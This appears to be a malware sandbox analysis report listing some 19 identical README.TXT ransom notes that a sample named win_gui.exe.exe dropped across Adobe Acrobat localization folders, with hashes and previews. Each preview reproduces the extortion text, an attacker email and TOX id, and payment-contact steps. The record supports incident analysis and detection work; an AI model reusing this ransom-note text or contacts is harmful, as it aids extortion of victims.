                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\he-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\hr-hr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\hu-hu\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

